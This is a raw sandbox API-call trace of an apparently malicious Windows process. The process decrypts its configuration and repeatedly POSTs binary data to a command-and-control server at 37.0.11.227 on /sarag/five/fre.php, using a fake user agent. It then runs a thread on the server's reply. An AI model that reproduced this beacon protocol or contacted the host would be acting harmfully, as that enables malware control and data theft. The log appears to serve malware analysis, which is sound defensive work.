[0204.254] socket (af=2, type=1, protocol=6) returned 0x470 [0204.254] connect (s=0x470, name=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0204.281] FreeAddrInfoW (pAddrInfo=0x6b2a88*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0204.281] GetProcessHeap () returned 0x690000 [0204.281] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0204.281] GetProcessHeap () returned 0x690000 [0204.281] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0204.282] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0204.283] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0204.283] GetProcessHeap () returned 0x690000 [0204.283] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0204.283] GetProcessHeap () returned 0x690000 [0204.284] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0204.284] GetProcessHeap () returned 0x690000 [0204.284] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0204.284] GetProcessHeap () returned 0x690000 [0204.284] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0204.285] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0204.286] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0204.286] GetProcessHeap () returned 0x690000 [0204.286] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6a9f58 [0204.286] GetProcessHeap () returned 0x690000 [0204.286] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0204.286] send (s=0x470, buf=0x6a9f58*, len=242, flags=0) returned 242 [0204.287] send (s=0x470, buf=0x6aba40*, len=159, flags=0) returned 159 [0204.287] GetProcessHeap () returned 0x690000 [0204.287] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0204.287] recv (in: s=0x470, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0204.369] GetProcessHeap () returned 0x690000 [0204.369] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0204.370] GetProcessHeap () returned 0x690000 [0204.370] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0204.370] GetProcessHeap () returned 0x690000 [0204.370] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0204.370] GetProcessHeap () returned 0x690000 [0204.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0204.371] closesocket (s=0x470) returned 0 [0204.371] GetProcessHeap () returned 0x690000 [0204.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0204.371] GetProcessHeap () returned 0x690000 [0204.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0204.371] GetProcessHeap () returned 0x690000 [0204.372] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0204.372] GetProcessHeap () returned 0x690000 [0204.372] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0204.372] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1390) returned 0x470 [0204.373] Sleep (dwMilliseconds=0xea60) [0204.375] GetProcessHeap () returned 0x690000 [0204.375] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0204.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.376] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.383] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0204.388] GetProcessHeap () returned 0x690000 [0204.388] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0204.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.391] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0204.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.392] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.393] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.393] GetProcessHeap () returned 0x690000 [0204.393] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0204.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.394] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0204.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.395] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0204.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.396] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0204.396] GetProcessHeap () returned 0x690000 [0204.396] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0204.397] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.397] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0204.397] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.398] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0204.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.399] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0204.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.399] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0204.399] GetProcessHeap () returned 0x690000 [0204.399] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0204.399] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0204.400] GetProcessHeap () returned 0x690000 [0204.400] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0204.400] GetProcessHeap () returned 0x690000 [0204.401] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0204.401] GetProcessHeap () returned 0x690000 [0204.401] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0204.401] GetProcessHeap () returned 0x690000 [0204.401] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0204.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.402] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.406] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0204.413] GetProcessHeap () returned 0x690000 [0204.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0204.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.414] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0204.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.415] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.416] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.416] GetProcessHeap () returned 0x690000 [0204.417] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0204.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.417] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0204.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.418] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0204.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.419] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0204.419] GetProcessHeap () returned 0x690000 [0204.419] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0204.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.420] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0204.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.421] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0204.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.424] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0204.424] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.425] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0204.425] GetProcessHeap () returned 0x690000 [0204.425] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0204.425] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2a60*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea90*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0204.425] GetProcessHeap () returned 0x690000 [0204.425] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0204.425] socket (af=2, type=1, protocol=6) returned 0x474 [0204.425] connect (s=0x474, name=0x6aea90*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0204.447] FreeAddrInfoW (pAddrInfo=0x6b2a60*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea90*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0204.447] GetProcessHeap () returned 0x690000 [0204.447] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0204.447] GetProcessHeap () returned 0x690000 [0204.447] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0204.448] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0204.448] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0204.448] GetProcessHeap () returned 0x690000 [0204.448] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0204.448] GetProcessHeap () returned 0x690000 [0204.449] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0204.449] GetProcessHeap () returned 0x690000 [0204.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0204.449] GetProcessHeap () returned 0x690000 [0204.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0204.450] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0204.450] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0204.450] GetProcessHeap () returned 0x690000 [0204.450] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6a91a8 [0204.450] GetProcessHeap () returned 0x690000 [0204.451] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0204.451] send (s=0x474, buf=0x6a91a8*, len=242, flags=0) returned 242 [0204.451] send (s=0x474, buf=0x6aba40*, len=159, flags=0) returned 159 [0204.451] GetProcessHeap () returned 0x690000 [0204.451] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0204.452] recv (in: s=0x474, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0204.523] GetProcessHeap () returned 0x690000 [0204.524] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a91a8 | out: hHeap=0x690000) returned 1 [0204.524] GetProcessHeap () returned 0x690000 [0204.525] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0204.525] GetProcessHeap () returned 0x690000 [0204.525] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0204.526] GetProcessHeap () returned 0x690000 [0204.526] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0204.526] closesocket (s=0x474) returned 0 [0204.527] GetProcessHeap () returned 0x690000 [0204.527] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0204.527] GetProcessHeap () returned 0x690000 [0204.528] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0204.528] GetProcessHeap () returned 0x690000 [0204.528] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0204.528] GetProcessHeap () returned 0x690000 [0204.529] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0204.529] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13a4) returned 0x474 [0204.535] Sleep (dwMilliseconds=0xea60) [0204.537] GetProcessHeap () returned 0x690000 [0204.537] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0204.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.538] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.547] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0204.553] GetProcessHeap () returned 0x690000 [0204.553] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0204.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.554] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0204.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.555] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.557] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.557] GetProcessHeap () returned 0x690000 [0204.558] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0204.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.560] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0204.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.560] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0204.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.564] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0204.564] GetProcessHeap () returned 0x690000 [0204.564] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0204.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.565] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0204.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.566] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0204.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.567] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0204.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.568] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0204.568] GetProcessHeap () returned 0x690000 [0204.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0204.568] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0204.569] GetProcessHeap () returned 0x690000 [0204.569] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0204.569] GetProcessHeap () returned 0x690000 [0204.570] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0204.570] GetProcessHeap () returned 0x690000 [0204.570] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0204.570] GetProcessHeap () returned 0x690000 [0204.570] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0204.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.571] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.575] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0204.582] GetProcessHeap () returned 0x690000 [0204.582] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0204.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.583] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0204.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.584] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.584] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.584] GetProcessHeap () returned 0x690000 [0204.585] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0204.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.586] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0204.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.587] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0204.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.587] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0204.587] GetProcessHeap () returned 0x690000 [0204.587] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0204.588] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.588] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0204.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.591] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0204.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.592] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0204.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.592] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0204.592] GetProcessHeap () returned 0x690000 [0204.592] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0204.593] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2d80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0204.593] GetProcessHeap () returned 0x690000 [0204.593] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0204.593] socket (af=2, type=1, protocol=6) returned 0x478 [0204.593] connect (s=0x478, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0204.685] FreeAddrInfoW (pAddrInfo=0x6b2d80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0204.685] GetProcessHeap () returned 0x690000 [0204.685] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0204.685] GetProcessHeap () returned 0x690000 [0204.685] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0204.686] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0204.687] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0204.687] GetProcessHeap () returned 0x690000 [0204.687] RtlAllocateHeap 